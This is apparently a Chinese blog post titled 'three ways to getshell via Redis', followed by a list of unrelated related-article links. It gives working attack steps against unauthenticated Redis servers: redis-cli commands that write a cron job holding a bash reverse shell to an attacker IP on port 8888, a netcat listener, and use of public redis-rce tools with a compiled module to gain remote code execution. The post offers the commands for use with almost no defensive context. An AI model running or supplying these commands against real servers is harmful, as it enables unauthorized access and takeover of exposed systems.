当前位置: 首页 > news >正文

redis getshell的三种方法

方法一

未授权访问复现-CSDN博客 的第一个。

方法二

wget http://download.redis.io/releases/redis-4.0.9.tar.gz

解压编译: 

tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install

更改配置文件:

vim redis.conf //修改redis.conf的配置文件添加bind:0.0.0.0

启动redis:

redis-server /root/redis-4.0.9/redis.conf

攻击机开启连接: 

redis-cli -h 47.93.51.60
set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.13.145/8888 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

开启监听:

nc -lvvp 8888

方法三

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

进入RedisModules-ExecuteCommand目录输入make,生成moudle.so 文件 。

cp /home/wangyibo/桌面/RedisModules-ExecuteCommand/module.so /home/wangyibo/桌面/redis-rce  

把生成的moudle.so复制到redis-rce目录里面,之后进入redis-rce目录里面输入 

python redis-rce.py -r 192.168.13.145 -p 6379 -L 192.168.111.130 -f moudle.so
http://www.lryc.cn/news/602974.html

相关文章:

  • 从释永信事件看“积善“与“积恶“的人生辩证法
  • CMake、CMakeLists.txt 基础语法
  • CTF-Web学习笔记:信息泄露篇
  • docker 入门,运行上传自己的首个镜像
  • 降低焊接机器人保护气体消耗的措施
  • Docker 部署 Supabase并连接
  • 记录自己第n次面试(n>3)
  • DAY-13 数组与指针
  • [ The Missing Semester of Your CS Education ] 学习笔记 Vim篇
  • 前端实现银河粒子流动特效的技术原理与实践
  • Linux 软件包管理详解:从命令到实战
  • 计算机网络编程-Socket通信以及实战
  • STM32 USB HOST 驱动FT232 USB转串
  • 安装anaconda后,如何进入python解释器
  • SSH 远程控制及相关工具
  • 常见的JVM虚拟机的参数详解
  • “量子通信”
  • 【C语言网络编程基础】TCP并发网络编程:io多路复用
  • 五自由度磁悬浮轴承转子:基于自适应陷波器的零振动攻克不平衡质量扰动的终极策略
  • linux du、df命令使用教程
  • 面向对象设计原则和设计模式分类
  • 开源AI智能体-JoyAgent集成Deepseek
  • C++模板元编程从入门到精通
  • [论文阅读] 人工智能 | 机器学习工作流的“救星”:数据虚拟化服务如何解决数据管理难题?
  • [机缘参悟-236]:通过AI人工神经网络理解人的思维特征:惯性思维、路径依赖、适应性、不同场合不同言行、经验、概率、常规与特殊情形(正态分布)、环境适应性
  • 5 分钟上手 Firecrawl
  • Java项目:基于SSM框架实现的社区团购管理系统【ssm+B/S架构+源码+数据库+毕业论文+答辩PPT+远程部署】
  • js的学习1
  • 如何理解有符号数在计算机中用​​补码​​存储
  • 阿里给AI To C战略戴上眼镜